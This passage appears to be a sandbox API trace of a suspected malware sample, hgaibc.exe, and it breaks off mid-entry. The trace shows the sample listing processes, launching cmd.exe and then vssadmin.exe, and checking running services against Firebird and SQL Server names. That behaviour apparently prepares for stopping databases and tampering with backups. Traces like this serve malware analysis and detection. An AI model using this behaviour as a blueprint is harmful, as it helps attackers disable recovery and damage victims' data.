[0174.746] lstrlenW (lpString="svchost.exe") returned 11 [0174.746] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0174.747] lstrlenW (lpString="dwm.exe") returned 7 [0174.747] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.748] lstrlenW (lpString="svchost.exe") returned 11 [0174.748] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.749] lstrlenW (lpString="svchost.exe") returned 11 [0174.749] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.750] lstrlenW (lpString="svchost.exe") returned 11 [0174.750] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.751] lstrlenW (lpString="svchost.exe") returned 11 [0174.751] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.753] lstrlenW (lpString="svchost.exe") returned 11 [0174.753] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.754] lstrlenW (lpString="svchost.exe") returned 11 [0174.754] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.755] lstrlenW (lpString="svchost.exe") returned 11 [0174.755] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.756] lstrlenW (lpString="svchost.exe") returned 11 [0174.756] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.757] lstrlenW (lpString="svchost.exe") returned 11 [0174.757] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.758] lstrlenW (lpString="svchost.exe") returned 11 [0174.758] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0174.759] lstrlenW (lpString="spoolsv.exe") returned 11 [0174.759] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.760] lstrlenW (lpString="svchost.exe") returned 11 [0174.761] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0174.762] lstrlenW (lpString="audiodg.exe") returned 11 [0174.762] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0174.763] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0174.763] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0174.764] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0174.764] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0174.765] lstrlenW (lpString="Memory Compression") returned 18 [0174.765] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0174.766] lstrlenW (lpString="sihost.exe") returned 10 [0174.766] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.767] lstrlenW (lpString="svchost.exe") returned 11 [0174.767] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0174.768] lstrlenW (lpString="msoia.exe") returned 9 [0174.768] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0174.770] lstrlenW (lpString="taskhostw.exe") returned 13 [0174.770] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0174.771] lstrlenW (lpString="explorer.exe") returned 12 [0174.771] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0175.034] lstrlenW (lpString="SearchUI.exe") returned 12 [0175.034] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0175.035] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0175.035] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0175.036] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0175.036] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0175.037] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0175.037] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0175.038] lstrlenW (lpString="hgaibc.exe") returned 10 [0175.038] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0175.039] lstrlenW (lpString="cmd.exe") returned 7 [0175.039] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0175.040] lstrlenW (lpString="conhost.exe") returned 11 [0175.040] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xefc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x3bc, pcPriClassBase=13, dwFlags=0x0, szExeFile="consent.exe")) returned 1 [0175.041] lstrlenW (lpString="consent.exe") returned 11 [0175.041] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0175.042] lstrlenW (lpString="dllhost.exe") returned 11 [0175.042] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0175.043] lstrlenW (lpString="vssadmin.exe") returned 12 [0175.043] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0175.044] CloseHandle (hObject=0x3ac) returned 1 [0175.044] Sleep (dwMilliseconds=0x1f4) [0175.623] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x458c240 [0175.624] EnumServicesStatusExW (in: hSCManager=0x458c240, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 0 [0175.624] GetLastError () returned 0xea [0175.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c30) returned 0x4601700 [0175.624] EnumServicesStatusExW (in: hSCManager=0x458c240, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4601700, cbBufSize=0x1c30, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4601700, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 1 [0175.625] CloseServiceHandle (hSCObject=0x458c240) returned 1 [0175.625] lstrlenW (lpString="Appinfo") returned 7 [0175.625] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0175.626] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0175.626] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0175.626] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0175.626] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0175.626] lstrlenW (lpString="AppXSvc") returned 7 [0175.626] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0175.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0175.627] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0175.627] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0175.627] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0175.627] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0175.627] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0175.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0175.627] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0175.627] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0175.627] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0175.627] lstrlenW (lpString="Audiosrv") returned 8 [0175.627] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0175.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0175.627] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0175.627] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0175.627] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0175.627] lstrlenW (lpString="BFE") returned 3 [0175.627] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0175.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0175.627] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0175.627] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0175.627] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0175.627] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0175.627] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0175.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0175.627] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0175.627] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0175.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0175.628] lstrlenW (lpString="CDPSvc") returned 6 [0175.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0175.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0175.628] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0175.628] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0175.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0175.628] lstrlenW (lpString="ClickToRunSvc") returned 13 [0175.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0175.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0175.628] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0175.628] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0175.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0175.628] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0175.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0175.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0175.628] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0175.628] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0175.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0175.628] lstrlenW (lpString="CryptSvc") returned 8 [0175.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0175.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0175.628] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0175.628] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0175.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0175.628] lstrlenW (lpString="DcomLaunch") returned 10 [0175.629] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0175.629] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0175.629] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0175.629] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0175.629] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0175.629] lstrlenW (lpString="DeviceAssociationService") returned 24 [0175.629] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0175.629] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0175.629] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0175.629] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0175.629] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0175.629] lstrlenW (lpString="Dhcp") returned 4 [0175.629] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0175.629] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0175.629] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0175.629] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0175.629] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0175.629] lstrlenW (lpString="Dnscache") returned 8 [0175.629] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0175.629] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0175.629] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0175.629] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0175.629] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0175.629] lstrlenW (lpString="DPS") returned 3 [0175.629] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0175.629] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0175.629] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0175.629] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0175.630] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0175.630] lstrlenW (lpString="DusmSvc") returned 7 [0175.630] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0175.630] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0175.630] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0175.630] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0175.630] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0175.630] lstrlenW (lpString="EventLog") returned 8 [0175.630] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0175.630] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0175.630] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0175.630] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0175.630] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0175.630] lstrlenW (lpString="EventSystem") returned 11 [0175.630] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0175.630] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0175.630] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0175.630] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0175.630] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0175.630] lstrlenW (lpString="FontCache") returned 9 [0175.630] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0175.630] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0175.630] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0175.630] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0175.630] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0175.630] lstrlenW (lpString="gpsvc") returned 5 [0175.630] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0175.630] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0175.631] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0175.631] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0175.631] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0175.631] lstrlenW (lpString="iphlpsvc") returned 8 [0175.631] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0175.631] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0175.631] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0175.631] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0175.631] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0175.631] lstrlenW (lpString="KeyIso") returned 6 [0175.631] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0175.631] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0175.631] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0175.631] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0175.631] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0175.631] lstrlenW (lpString="LanmanServer") returned 12 [0175.631] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0175.631] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0175.631] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0175.631] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0175.631] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0175.631] lstrlenW (lpString="LanmanWorkstation") returned 17 [0175.631] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0175.631] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0175.631] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0175.631] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0175.631] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0175.632] lstrlenW (lpString="lfsvc") returned 5 [0175.632] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0175.632] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0175.632] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0175.632] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0175.632] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0175.632] lstrlenW (lpString="lmhosts") returned 7 [0175.632] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0175.632] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0175.632] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0175.632] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0175.632] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0175.632] lstrlenW (lpString="LSM") returned 3 [0175.632] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0175.632] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0175.632] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0175.632] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0175.632] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0175.632] lstrlenW (lpString="MpsSvc") returned 6 [0175.632] 